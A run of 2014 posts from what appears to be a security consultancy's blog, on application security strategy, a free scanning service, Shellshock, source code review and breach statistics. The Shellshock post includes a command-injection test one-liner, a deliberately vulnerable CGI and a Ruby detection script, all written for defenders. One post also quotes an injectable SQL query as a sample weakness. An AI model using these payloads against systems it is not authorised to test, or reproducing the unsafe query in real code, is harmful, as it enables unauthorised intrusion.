
Thursday, November 6, 2014

Developing an Effective Strategy for Application Security

Web application security is perhaps the most commonly and frequently discussed topic among researchers, small businesses and large enterprises alike. The primary reason is that it has long overtaken the network as the most commonly attacked layer in a given IT infrastructure. Network and operating system security has matured to a certain extent. Combined with various OS-level hardening mechanisms, traditional attacks against network services have largely been mitigated or have become significantly more costly. Web applications, however, have for some reason not yet achieved a similar maturity in terms of risk mitigation. Despite multiple WAF products and other security solutions for web application security, the number of incidents in which an organisation and its data were compromised by exploiting issues in web applications has only increased in recent times. For this reason, a different strategy or approach is required in order to safeguard web applications and implement a practice that encourages secure web application development.

Let Numbers Speak for Themselves

In order to better visualise the changing (or perhaps changed) threat perception in applications and their associated infrastructure, let us consider the case of a web server and two web application development frameworks that are very popular among enterprise application developers - SpringSource Spring and Apache Struts. The statistics reveal that the number of vulnerabilities in the web server software itself is declining. The actual threat perception is significantly lower than the raw numbers suggest, because various OS-level mitigation strategies make exploitation of memory corruption and similar issues in the web server process extremely costly and difficult. For web applications, however, the vulnerability classes are significantly different from those mitigated at the OS level. New techniques and ease of exploitation have greatly increased the threat perception for web applications and web application development frameworks. Apart from the common vulnerability classes, business logic vulnerabilities are another important issue affecting a lot of web applications.

Statistics for SpringSource Spring Framework

Statistics for Apache Struts Framework
Vulnerabilities in popular web application development frameworks are particularly critical due to their widespread impact. Since large enterprise applications are not easy to upgrade due to multiple dependencies, vulnerabilities in framework software are extremely critical for such applications and must be mitigated if they cannot be patched immediately.

Evaluating The Application Security Maturity

There is no single strategy that can help all organisations define a suitable approach for application security. There are various models; however, a carefully chosen model has to be customised and adopted based on the current posture, needs and roadmap of any given organisation. Therefore, in order to define a suitable policy, it is very important to evaluate and ascertain the current application security maturity level of an organisation. This can be done to a certain extent by asking a few questions:

  1. Is an application penetration test (or VA, as it is widely called) conducted regularly on all important applications?
  2. Are the same vulnerability classes, e.g. SQL Injection or CSRF, detected every time a security test is conducted?
  3. Is there a training and evaluation program for developers?
  4. Are secure coding guidelines enforced at the IDE (or similar) level?

The above questions help in ascertaining the current security posture of an organisation and, to some extent, provide a direction for improvement in application security maturity. For example, if you have never done a penetration test on your applications [1], there is probably no need to immediately think of high-level security policies or strategies; rather, the organisation should focus on initiating regular security testing practices. On the other hand, if you have been doing penetration testing for some time [2], yet the same classes of vulnerabilities are discovered every time in different applications or newly implemented features, perhaps it is time to think about the effectiveness of the strategy and its RoI. Questions [3] and [4] point to strategies that need to be adopted in order to avoid recurring vulnerabilities of similar classes.

Towards an Effective Strategy for Application Security Maturity

A good strategy for implementing or improving application security in an organisation should consist of at least the following:

  • Regular security testing of all applications against commonly occurring and newly discovered vulnerabilities.
  • Comprehensive security tests covering maximum functionality and business logic, performed for at least the business-critical applications if not all.
  • Vulnerability intelligence - identify which classes of vulnerabilities have been detected most often in your applications, and whether similar classes of vulnerabilities are being introduced in newly developed applications and/or features.
  • Developer training on how to fix, avoid and mitigate security vulnerabilities. This helps ensure that similar vulnerabilities are not re-introduced in future development efforts.

In general, the security strategy for most organisations is reactive in nature, i.e. we react to discovered vulnerabilities by patching or by mitigating the threat via workarounds. For organisations with a greater threat perception, this cannot continue forever! An organisation must develop a security roadmap that moves forward - from Reactive to Proactive and finally towards Predictive.

For almost a decade, implementing security in an organisation usually started with a VA or PT, followed by patching of the discovered issues. However, due to the nature of current threats and the skill level of adversaries, it is not enough to keep fixing issues discovered during VA/PT. This method simply does not scale and becomes almost unmanageable for large organisations with a wide range of assets. It is important for an organisation to be more proactive: mitigate common classes of vulnerabilities and work towards a better security development life-cycle in which common security issues are avoided at the design and development stages themselves.

Some of the points that should be considered while developing an application security strategy:

  • Regular security testing
  • Vulnerability management & intelligence
  • Security as a part of Development/SDLC
  • Developer training and skill development
  • Operational Security (secure deployment and management of apps)

Wednesday, October 8, 2014

Announcing Free Scan for Web Application Security

Online free service for Web App Security

What is it?

We are super excited to launch our FreeScan for Web Application service. It is an online hosted service that can perform automatic security scans of websites and web applications. We have implemented tests for the most commonly occurring issues in websites and web applications that have a security impact.

Who is it for?

This service can be used by anybody with a web presence whose business continuity depends on the confidentiality, integrity and availability of its website, business data and client data. Online businesses with a strong brand presence can also use this service to look for common security issues and prevent brand damage due to security incidents. Security engineers and administrators can benefit by scanning their web infrastructure using this service. If you are an enterprise with mass scanning requirements, this might not be the right solution for you; however, do get in touch - we might be able to offer something appropriate.

What does it offer?

The FreeScan for Web currently looks for a bunch of commonly occurring issues in web applications including:

  • HTTP headers security
  • HTTP cookie security
  • HTTP insecure methods
  • SSL/TLS crypto strength & security
  • SSL/TLS configuration weakness
  • Heartbleed
  • Shellshock

Why is it Free?

We at 3S Labs have been doing a lot of web application penetration testing; in fact, the web security test is perhaps one of our most frequently delivered services. Through this prolonged involvement, we have written a number of miscellaneous scripts and tools for detecting common issues in web applications. Although the quality of any penetration test depends significantly on the skill and expertise of the tester involved, identification of many commonly occurring issues can be automated to a certain extent to increase productivity. FreeScan is our project to offer online hosted security services for free, using tools and techniques that graduate out of our research lab. We intend to maintain and extend this service based on our R&D output. However, only tests that can be automated with a certain degree of reliability and executed in a fixed time will be added to FreeScan. This means you can test your applications for common issues, but for serious security requirements (quality & coverage) you still need a good and experienced security consultant.

Due to the scope and architectural pattern used in developing the FreeScan service, it can be easily scaled up or down depending on demand. We should be able to support scanning of a large number of websites and web applications using this service. However, due to the open nature of the service, misuse is likely. In order to prevent misuse, we currently require manual approval of each scan. In the future, we might automate ownership verification of a site to limit misuse and legal issues on our part.

Coverage and Quality

A conventional Web Application Penetration Test consists of roughly the following steps:
  1. Application discovery through web page crawling.
  2. Attack surface enumeration based on detected functionality.
  3. Testing various input/output flows for possible vulnerabilities.
  4. Business logic testing.
  5. Framework/technology specific testing.
In this case, [1], [2] and [3] are directly related: the quality of [1] and [2] determines the effectiveness of [3], which is the most important part of a proper web application security test. Apart from that, a security consultant must also enumerate the various business logic flows in the application and test them duly for possible violations. In general, a web application test with good coverage requires significant human intervention and cannot be fully automated. Because of this human intervention, the quality of the findings depends on the skill and experience of the person performing the test.

We are not trying to build a full-fledged web application security scanner; the complexity involved in developing and maintaining such software is beyond the scope of this service. However, for all practical purposes, it has been observed that roughly 20% of the vulnerabilities (or weaknesses) appear 80% of the time. Many of these issues are trivial to detect and can be automated as well. We want to implement these tests in our FreeScan service so that it can be used to quickly identify the most commonly occurring issues in a website or web application.

Critical Vulnerability Detection

Due to our in-house R&D capability, we are in a position to respond quickly to critical vulnerabilities that are discovered or found exploited in the wild. We intend to add detection capability in FreeScan for critical vulnerabilities discovered in the future. For example, we were able to analyze, reproduce and add a test for the recently disclosed Shellshock vulnerability. FreeScan for Web Application supports scanning web applications for Shellshock.


Friday, September 26, 2014

CVE-2014-6271 Bash Vulnerability a.k.a Shellshock

CVE-2014-6271, a.k.a Shellshock, is a command execution vulnerability in the Bash shell via specially crafted environment variables. As per NIST, exploitation has been demonstrated against vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Due to the widespread deployment and use of the Bash shell on almost all Linux, OS X and other *nix based systems, this vulnerability is considered extremely critical, with a possible impact matching the Heartbleed issue, if not exceeding it.

Who is Affected?

Any application or system that invokes a command through the bash shell is potentially vulnerable. In order to exploit this issue in a target, an attacker needs to:

  • Set any environment variable with attacker-controlled data.
  • Force the target to invoke any shell command through bash -c <cmd>

The immediate targets that can be exploited remotely are web servers with CGI support, particularly CGI scripts written as shell scripts. Apart from that, web applications written in scripting languages such as PHP, Perl, Python, Ruby etc. are equally vulnerable if deployed in CGI mode and the application at some point invokes a shell command using functions like popen, exec, system etc.

How to Fix?

The bash shell needs to be updated to a patched version. For Debian based systems, it can be done using the following command:
apt-get install --only-upgrade bash

For RedHat or CentOS based systems, the following command can be used to update bash:
yum update bash

Note: The current fix in Bash is considered incomplete; a complete fix was yet to be released at the time of writing. The bypass of the initial fix has been assigned the vulnerability identifier CVE-2014-7169.

Technical Analysis & Test Case

The simplest test case involves executing the following command in an affected bash shell:
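This is the widely published one-liner from the public advisories referenced at the end of this post; it defines a bash function in an environment variable with extra code appended after the function body:

```shell
env x='() { :;}; echo Vulnerable' bash -c "echo this is a test"
```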

If the string Vulnerable is printed, then the shell is affected by this issue.

Remote exploitation of this vulnerability can be demonstrated in a local environment using Apache/CGI based deployment and an affected version of Bash shell.

Sample CGI to demonstrate the vulnerability:
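A minimal bash CGI along the following lines would suffice (a sketch; the file name and content are illustrative, not the original post's exact script). When deployed under Apache's cgi-bin, mod_cgi exports request headers such as User-Agent into the environment (e.g. HTTP_USER_AGENT) before bash runs the script, which is exactly the trigger condition described above:

```shell
#!/bin/bash
# poc.cgi - deploy under cgi-bin with execute permission (chmod +x).
# On a vulnerable bash, code smuggled into any request header is
# executed when bash imports the environment, before these lines run.
echo "Content-type: text/plain"
echo ""
echo "Hello from CGI"
```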

Following ruby script can be used as a test case for exploiting the above CGI for vulnerability detection:
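A script along these lines would do the job (a reconstruction, not the original script; the target URL is a placeholder for your own lab deployment). It sends the function-definition payload in the User-Agent header; on a vulnerable CGI the injected echo runs before the script's own output, so its text surfaces as an extra HTTP response header:

```ruby
require 'net/http'
require 'uri'

# Placeholder target - point this at your own test deployment only.
TARGET = URI('http://localhost/cgi-bin/poc.cgi')

# The injected command prints a header line before the CGI's own
# output, so a vulnerable server returns it as a response header.
PAYLOAD = "() { :;}; echo 'X-Shellshock: vulnerable'"

def shellshock?(uri, payload)
  request = Net::HTTP::Get.new(uri)
  request['User-Agent'] = payload
  response = Net::HTTP.start(uri.host, uri.port) { |http| http.request(request) }
  !response['X-Shellshock'].nil?
end

# Usage (only against systems you are authorised to test):
#   puts shellshock?(TARGET, PAYLOAD) ? 'Vulnerable' : 'Not detected'
```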

The vulnerability can be confirmed if the HTTP response contains an additional header named X-Shellshock. Our FreeScan for Web Application service has been updated with a test that detects this vulnerability using a similar test case to the one described above. However, it must be noted that the test is limited, uses a common heuristic, and should not be considered 100% reliable.


  • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
  • https://rhn.redhat.com/errata/RHSA-2014-1306.html
  • https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Thursday, September 11, 2014

5 Vulnerabilities That Surely Need a Source Code Review

We have been performing Source Code Review (SCR) of multiple Java/JavaEE based web applications during the recent past. The results have convinced us and our customers that SCR is a valuable exercise that must be performed for business-critical applications in addition to penetration testing. In terms of vulnerabilities, SCR has the potential to find vulnerability classes that an application penetration test will usually miss. In this article we provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR and which are missed, or are very difficult to identify, during penetration testing.

Additionally, we hope to answer the following commonly asked questions:
  1. I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application?
  2. What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test?
Read More: Web Application Penetration Testing Service

Approach for Source Code Review

The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps:

Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)

A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are:
  • Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
  • Dangerous or risky API calls such as Runtime.exec, Statement.execute
  • Insecure design, such as hashing passwords with unsalted MD5.
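For the dynamic SQL example above, the standard remediation in Java is a parameterized query, which keeps user-supplied values out of the SQL structure (a generic sketch; the class and table names are illustrative):

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class ItemDao {
    // Placeholders (?) keep the query structure fixed; user input is
    // bound as data and cannot alter the SQL, unlike concatenation.
    static final String SQL =
        "SELECT * FROM items WHERE owner = ? AND itemname = ?";

    public static ResultSet findItem(Connection conn, String userName,
                                     String itemName) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(SQL);
        ps.setString(1, userName);
        ps.setString(2, itemName);
        return ps.executeQuery();
    }
}
```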

Correlation between Security Weakness and Dynamic Input

Dynamic construction of an SQL query without the necessary validation or sanitization is definitely a security weakness; however, it may not lead to a security vulnerability if the SQL query does not involve any untrusted data. Hence it is necessary to identify code paths that start with a user input and reach a possibly weak or risky code block. Skipping this phase will leave a huge number of false positives in the results.

This step generally involves enumerating sources and finding a path from source to sink. A source in this case is any user-controlled, untrusted input, e.g. HTTP request parameters, cookies, uploaded file contents etc.

Five Vulnerabilities Source Code Review should Find

1. Insecure or Weak Cryptographic Implementation

SCR is a valuable exercise for discovering weak or below-standard cryptographic techniques used in applications, such as:
  • Use of MD5 or SHA1 without salt for password hashing.
  • Use of Java Random instead of SecureRandom.
  • Use of the weak DES cipher.
  • Use of a weak mode of an otherwise strong cipher, such as AES in ECB mode.
  • Susceptibility to the Padding Oracle Attack.
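Two of these points can be sketched in Java: use SecureRandom rather than java.util.Random, and prefer an authenticated mode such as AES/GCM over ECB (a generic example using the standard JCE APIs and assuming a provider with GCM support, not code from any reviewed application):

```java
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

public class CryptoSketch {
    // AES in GCM mode: unlike ECB, identical plaintext blocks do not
    // produce identical ciphertext, and the result is authenticated.
    public static byte[] encrypt(byte[] plaintext, SecretKey key) throws Exception {
        byte[] iv = new byte[12];                 // fresh IV per message
        new SecureRandom().nextBytes(iv);         // not java.util.Random

        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        byte[] ciphertext = cipher.doFinal(plaintext);

        // Prepend the IV so the receiver can initialise decryption.
        byte[] out = new byte[iv.length + ciphertext.length];
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ciphertext, 0, out, iv.length, ciphertext.length);
        return out;
    }
}
```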

2. Known Vulnerable Components

For a small-to-medium scale JavaEE based application, as much as 80% of the code executed at runtime can come from libraries. The actual percentage for a given application can be determined by referencing the Maven POM file or Ivy dependency file, or by looking into the lib directory. It is very common for dependent libraries and framework components to have known vulnerabilities, especially if the application has been developed over a considerable time frame. As an example, during 2011, two popular vulnerable components alone were downloaded 22 million times.

During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of the exact version numbers of the various libraries and framework components used - something that is lacking during an application penetration test.

3. Sensitive Information Disclosure

An SCR should discover whether an application, in binary (jar/war) or source code form, discloses sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are:
  • Logs: Application logs sensitive information such as credentials or access keys in log files.
  • Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files.
  • Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data.
  • Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks.

4. Insecure Functionalities

An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below:

  • RMI calls over insecure channel.
  • Kerberos implementation that are vulnerable to replay attack.
  • Legacy authentication & authorization technique with known weaknesses. 
  • J2EE bad practices such as direct management of database/resource connection that may lead to a Denial of Service.
  • Race condition bugs.

5. Security Misconfiguration

SCR should be able to find common security misconfigurations in the application and its deployment environment, related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include:

  • Application containers and database servers running with the highest (and unnecessary) privileges.
  • Default accounts enabled with unchanged passwords.
  • Insecure local file storage.

Additional Notes

An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above.

It is possible to conduct an in-depth review of the implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find code that lacks or misuses such controls in a vulnerable manner, resulting in a bypass of the protection.

There are multiple APIs that are considered risky or insecure as per various secure coding guidelines. Usage of such APIs in a given application can be discovered easily and quickly during an SCR.

SCR has the added benefit of being non-disruptive, i.e. the activity does not require access to the production environment and will not cause any service disruption.

Source Code Review (SCR) is a valuable technique for discovering vulnerabilities in your enterprise application. It discovers certain classes of vulnerabilities which are difficult to find through conventional application penetration testing. However, it must be noted that application penetration testing and source code review are complementary in many ways, and both independently contribute to enhancing the overall security of the application and infrastructure.

Thursday, August 28, 2014

Attack Patterns of 2013 and Lessons for the Future

Verizon DBIR 2014 is one of the most comprehensive and well-researched reports on the attacks and data breaches seen during 2013 by companies involved in attack & incident analysis and threat intelligence.

2013 Attack Patterns

As per the Data Breach Investigation Report (DBIR), the year 2013 saw the top attacks and incidents in the following areas:
  • Point-of-Sale Systems
  • Web Applications
  • Cyber Espionage
  • Attack on Financial Services

Top attack patterns

Point of Sale (POS) Systems

It was found that the majority of attacks on POS systems were external in nature, i.e. from outside the operating network. The intruders used simplistic scanning tools to identify POS systems over the Internet. Once a system was identified, educated password guessing and public exploits were the main tools used to gain access. RAM scrapers were the primary tool of choice for these threat actors to collect decrypted payment information, including credit card details.

Web Applications

Web applications are surely the target of choice for most attackers. The amount of bug bounty money earned by researchers across the world from companies like Google, Facebook, Paypal etc. for web application vulnerabilities speaks for itself.

However, it must be considered that bug bounty programs should not be treated as a replacement for conventional penetration testing; the two approaches are complementary. Any professional services engagement is usually time-boxed and ideally should focus on the core aspects of the security of the target application, including its possible attack surfaces and the issues that directly affect the business operations of the application. Given a large application, it may not be possible to identify all vulnerabilities within the defined time frame. This is where the bug bounty model comes in: the crowd-sourced nature and pay-per-vulnerability model are effective in identifying and eliminating the maximum number of low-hanging fruits in the most cost-effective manner. This is a typical case of "given enough eyeballs, all bugs are shallow". It should also be noted that really complex and interesting vulnerabilities in popular services such as Facebook, Google, Github etc. have also been disclosed as part of bug bounty initiatives. Given the sheer volume of web applications, it is generally a better approach to consider both professional penetration testing and bug bounty programs for an effective security testing strategy.

Insider Abuse

It is relatively well known that an information technology infrastructure faces threats not only from outside its corporate network but also from inside. There have been multiple cases where threat actors were found to be insiders or were assisted by insiders.

However, it should be considered that, due to a lack of security awareness and operational security practices, insiders may end up being the pawns or the pivot for launching attacks from inside the local network. The exploits of the Syrian Electronic Army have highlighted the need for appropriate operational security practices. Even the strongest and most secure IT infrastructure may end up compromised due to a lack of security awareness among those operating the systems. Hence it is very important to consider security in all three aspects: People, Process & Technology.

Shifting Motivation for Threat Actors

The DBIR also highlights an interesting pattern - the shifting motivation of threat actors. This is inevitable given the rise of bug bounty programs and the determination of important software vendors to pursue defence-in-depth through exploit mitigation techniques that seriously increase the cost of practical attacks.

Threat actor motivation over time

Contrary to popular perception, it turns out that random hacking incidents are relatively rare, and most incidents so far have been clearly motivated by economic gain. Over time, however, the data shows that threat actors are shifting from financial fraud to espionage-related activities. This is probably an indicator of the growing importance of the cyber medium for the security agencies of various governments. It might also be an indicator of the growing cost of conducting practical attacks using sophisticated tools and 0day exploits.

Lessons or Inferences from the Investigation Report

  • POS system compromises could have been prevented by minimal security investment - penetration testing and basic operational security such as strong passwords and the use of anti-virus software could have prevented a majority of the incidents.
  • Web application vulnerabilities are still prevalent. The industry in general is very much aware of the issues, and the rise of bug bounty programs might help curb exploited vulnerabilities to a certain extent - as long as companies do not replace conventional penetration testing with bug bounty programs; the two complement each other.
  • The espionage "industry" is on the rise. The amount of leakage from the agencies involved in cyber espionage and the exposure of their contractor companies provide enough evidence of its rise and prevalence. Growing investment will encourage researchers to continue innovative security research. Highly sophisticated tools and exploits will continue to appear, but the cost of entry will be very high.

General Takeaway

  • A minimum security investment is a must for any IT-based business.
  • For organisations with serious security concerns, it is very important to realise that security cannot be achieved by a one-time investment. It is a practice that involves regular activities and the development of the individuals responsible for its operations.
  • The human factor is an important aspect of the overall organisational IT infrastructure. The security maturity of the human factor must be considered along with the technological aspect.
  • Vulnerabilities will exist. Most leaders in this business accept this fact and are working towards defense-in-depth. However, you must reach a certain security maturity level in terms of your internal practices and externally exposed risks before you can start considering such strategies effectively.